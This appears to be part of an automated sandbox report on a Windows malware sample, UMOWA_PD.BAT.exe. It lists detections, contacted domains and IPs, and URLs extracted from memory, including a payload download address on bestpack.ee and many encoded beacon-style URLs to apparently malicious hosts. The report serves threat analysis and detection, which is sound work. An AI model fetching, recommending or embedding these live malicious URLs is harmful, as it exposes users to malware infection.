        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.albero-dveri.online/7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://www.invicta.world/tcs6/0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
        http://www.dfmagazine.shop/7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=0%Avira URL Cloudsafe
        https://reg.ru0%Avira URL Cloudsafe
        https://bestpack.ee/POL.bin.~0%Avira URL Cloudsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        http://www.inastra.online/Instagram_Online_Sign_Up.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEX0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        http://www.typ67.top/qjs8/0%Avira URL Cloudsafe
        http://www.komart.shop/qwk1/0%Avira URL Cloudsafe
        http://www.tukaari.shop/dlt0/0%Avira URL Cloudsafe
        http://www.ngmr.xyz/txr6/0%Avira URL Cloudsafe
        https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
        https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=0%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
        https://bestpack.ee/o0%Avira URL Cloudsafe
        http://www.inastra.online/Instagram_Online_Viewer.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXK0%Avira URL Cloudsafe
        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
        http://www.tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJX100%Avira URL Cloudmalware
        http://www.greekhause.org/phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=0%Avira URL Cloudsafe
        http://www.albero-dveri.online/7cy1/0%Avira URL Cloudsafe
        http://www.dfmagazine.shop/7k8f/0%Avira URL Cloudsafe
        https://www.networksolutions.com/0%Avira URL Cloudsafe
        https://bestpack.ee/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan0%Avira URL Cloudsafe
        https://bestpack.ee/POL.binl0%Avira URL Cloudsafe
        https://bestpack.ee/POL.bin0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
        http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
        http://www.inastra.online/ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://www.greekhause.org/phvf/0%Avira URL Cloudsafe
        http://www.tempatmudisini01.click/iydt/100%Avira URL Cloudmalware
        https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
        https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
        http://www.greekhause.org0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
        http://www.quovadis.bm00%Avira URL Cloudsafe
        http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.online0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
        https://gemini.google.com/app?q=0%Avira URL Cloudsafe
        http://www.dxeg.lol/ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto0%Avira URL Cloudsafe
        https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&0%Avira URL Cloudsafe
        https://dts.gnpge.com0%Avira URL Cloudsafe
        http://www.typ67.top/qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
        http://www.tukaari.shop/dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://www.dorikis.online/d84b/0%Avira URL Cloudsafe
        https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd0%Avira URL Cloudsafe
        https://cdn.consentmanager.net0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
        http://www.Inastra.online0%Avira URL Cloudsafe
        https://www.google.com/images/branding/product/ico/googleg_alldp.ico0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
        http://www.ngmr.xyz/txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z100%Avira URL Cloudmalware
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
        http://www.platinumkitchens.info/qo4k/0%Avira URL Cloudsafe
        http://bestpack.ee/POL.bin0%Avira URL Cloudsafe
        http://www.dhkatp.vip/yyvd/0%Avira URL Cloudsafe
        http://www.invicta.world/tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
        http://www.inastra.online/sk-logabpstatus.php?a=SW1RdDVpeXN5Y0RTL3pGdHVTRDlkWG5JV05MNzRrTHJVYU1uM2xS0%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        http://www.whats-in-the-box.org/bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o=0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
        http://www.inastra.online/display.cfm0%Avira URL Cloudsafe
        https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
        https://delivery.consentmanager.net0%Avira URL Cloudsafe
        https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
        http://www.inastra.online/px.js?ch=20%Avira URL Cloudsafe
        http://www.inastra.online/px.js?ch=10%Avira URL Cloudsafe
        http://www.linkwave.cloud/was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        https://assets.web.com/legal/English/MSA/v1.0.0.3/ServicesAgreement.pdf0%Avira URL Cloudsafe
        https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
        http://www.komart.shop/qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        https://bestpack.ee/POL.binNy0%Avira URL Cloudsafe
        http://bestpack.ee/POL.binV~0%Avira URL Cloudsafe
        http://www.platinumkitchens.info/qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=0%Avira URL Cloudsafe
        http://www.dhkatp.vip/yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
        http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.dxeg.lol/ytua/0%Avira URL Cloudsafe
        http://www.linkwave.cloud/was5/0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        bestpack.ee
        		185.86.211.137
        		truefalse
          		unknown
          www.albero-dveri.online
          		194.58.112.174
          		truetrue
            		unknown
            www.inastra.online
            		208.91.197.27
            		truetrue
              		unknown
              dxzz.top
              		137.175.33.56
              		truetrue
                		unknown
                whats-in-the-box.org
                		3.33.130.190
                		truetrue
                  		unknown
                  linkwave.cloud
                  		3.33.130.190
                  		truetrue
                    		unknown
                    tukaari.shop
                    		3.33.130.190
                    		truetrue
                      		unknown
                      dfmagazine.shop
                      		84.32.84.32
                      		truetrue
                        		unknown
                        dhkatp.vip
                        		3.33.130.190
                        		truetrue
                          		unknown
                          www.invicta.world
                          		13.248.169.48
                          		truetrue
                            		unknown
                            tempatmudisini01.click
                            		103.21.221.4
                            		truetrue
                              		unknown
                              komart.shop
                              		133.130.35.90
                              		truetrue
                                		unknown
                                www.ngmr.xyz
                                		54.67.87.110
                                		truetrue
                                  		unknown
                                  www.dorikis.online
                                  		162.213.249.216
                                  		truetrue
                                    		unknown
                                    greekhause.org
                                    		3.33.130.190
                                    		truetrue
                                      		unknown
                                      platinumkitchens.info
                                      		3.33.130.190
                                      		truetrue
                                        		unknown
                                        typ67.top
                                        		38.47.207.146
                                        		truetrue
                                          		unknown
                                          www.tukaari.shop
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.linkwave.cloud
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.dfmagazine.shop
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.dxeg.lol
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.dhkatp.vip
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.whats-in-the-box.org
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      www.greekhause.org
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        www.platinumkitchens.info
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.komart.shop
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.typ67.top
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              www.tempatmudisini01.click
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown

                                                                Contacted URLs

                                                                NameMaliciousAntivirus DetectionReputation
                                                                http://www.dfmagazine.shop/7k8f/?O4bP=9dRH6ZfHbJX&Xb3xI=1xd2XIdTc2qaFZ+FWSTYli7OxzQOBufybu6t7KDIboRfwcHmUmPthK5WfpWTXJmR/FSLDU2eJw9bxVvh/BR2RAGhDgY7k/sU7CIWPHYqUL7qqxcngXtaZyk=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.invicta.world/tcs6/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.albero-dveri.online/7cy1/?Xb3xI=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.typ67.top/qjs8/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ngmr.xyz/txr6/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tukaari.shop/dlt0/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.komart.shop/qwk1/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dfmagazine.shop/7k8f/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.greekhause.org/phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tempatmudisini01.click/iydt/?Xb3xI=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z+iB4Tcv9O6cZB31p1Mi5MvPz0n4i/4vc8VuesM/xDDO+6C7ZbX/5xARUztqgUqGu06GFp6xk=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.albero-dveri.online/7cy1/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/POL.binfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.greekhause.org/phvf/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tempatmudisini01.click/iydt/true
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                http://www.dxeg.lol/ytua/?Xb3xI=eEoKyIBkgP1r3UaSX5x2BcdCaSeQE0m7SIzn6MAF2Eoa7eZjgA7VjWJ9hDDUm15GkCbg2BHkZRaH6Ojl2CuAMP081j8WR4/cwGyXJgzH3SFq+T0y0nykltc=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.typ67.top/qjs8/?Xb3xI=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.tukaari.shop/dlt0/?Xb3xI=9mltyUpqTpNFGgiLLM/QIt0JA1EyaLVwbNO6LVK8xMKAahqO0kx85NrrrztI4+WdJ+WmFSXeCNM39PHdIGjD1nD8ckOcgacQtsimUjnJeyDglSYeX59cdP4=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dorikis.online/d84b/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ngmr.xyz/txr6/?Xb3xI=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.platinumkitchens.info/qo4k/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://bestpack.ee/POL.binfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dhkatp.vip/yyvd/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.invicta.world/tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.whats-in-the-box.org/bqye/?O4bP=9dRH6ZfHbJX&Xb3xI=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.linkwave.cloud/was5/?Xb3xI=y8MnD3CAUjfvlbCaxAVac63GvK68hywkVQck0F03MMraCQdP6i6ahgEcKS99S8jCMAfRd1EgvYBIkI1gFr2JNRymkxf7KUrPibiqIzK4PCKgQN9qHiwVnD0=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.komart.shop/qwk1/?Xb3xI=zuS7aiF7UCmUZEGCFTElZNoc1TsXMIUH7bJjsGqWHOHqpoebjKjp7AEKoIo96ikD3t7upPrvfpp3YpWkIK1WRnsiE3z7WHp76C45XcEHI5LxV+/vcHJ1HMs=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.platinumkitchens.info/qo4k/?O4bP=9dRH6ZfHbJX&Xb3xI=36KtwjIDafomy9tqOdqNwmsTn0KS8yDqwBoT0TnhmWNBmrcWA57j581r3y6lS3Ypxl7bXHdk4WhS3KsNzHZbX1L1UxoK9zL5luuQrcJM9iAor4hALAJtoKM=true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dhkatp.vip/yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJXtrue
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.linkwave.cloud/was5/true
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.dxeg.lol/ytua/true
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://duckduckgo.com/chrome_newtabipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DD0000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/ac/?q=-11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://reg.ruipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/POL.bin.~UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/Instagram_Online_Sign_Up.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/oUMOWA_PD.BAT.exe, 00000002.00000003.15299140949.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDUMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000626000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.gopher.ftp://ftp.UMOWA_PD.BAT.exe, 00000002.00000001.15100533752.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=ipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.inastra.online/Instagram_Online_Viewer.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ipconfig.exe, 00000004.00000003.15574993726.0000000007D62000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064432079.0000000007DD0000.00000004.00000020.00020000.00000000.sdmp, -11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/UMOWA_PD.BAT.exe, 00000002.00000003.15299140949.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2ipconfig.exe, 00000004.00000002.19062788752.0000000003C04000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.19064253157.0000000006270000.00000004.00000800.00020000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000002EE4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.networksolutions.com/firefox.exe, 00000006.00000002.15682251540.0000000016B24000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-11EqE.4.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lanipconfig.exe, 00000004.00000002.19062788752.0000000004570000.00000004.10000000.00040000.00000000.sdmp, giLTwJlyLWpfb.exe, 00000005.00000002.19983762514.0000000003850000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://bestpack.ee/POL.binlUMOWA_PD.BAT.exe, 00000002.00000003.15299601778.0000000003A77000.00000004.00000020.00020000.00000000.sdmp, UMOWA_PD.BAT.exe, 00000002.00000002.15394881294.0000000003A77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://nsis.sf.net/NSIS_ErrorErrorUMOWA_PD.BAT.exefalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
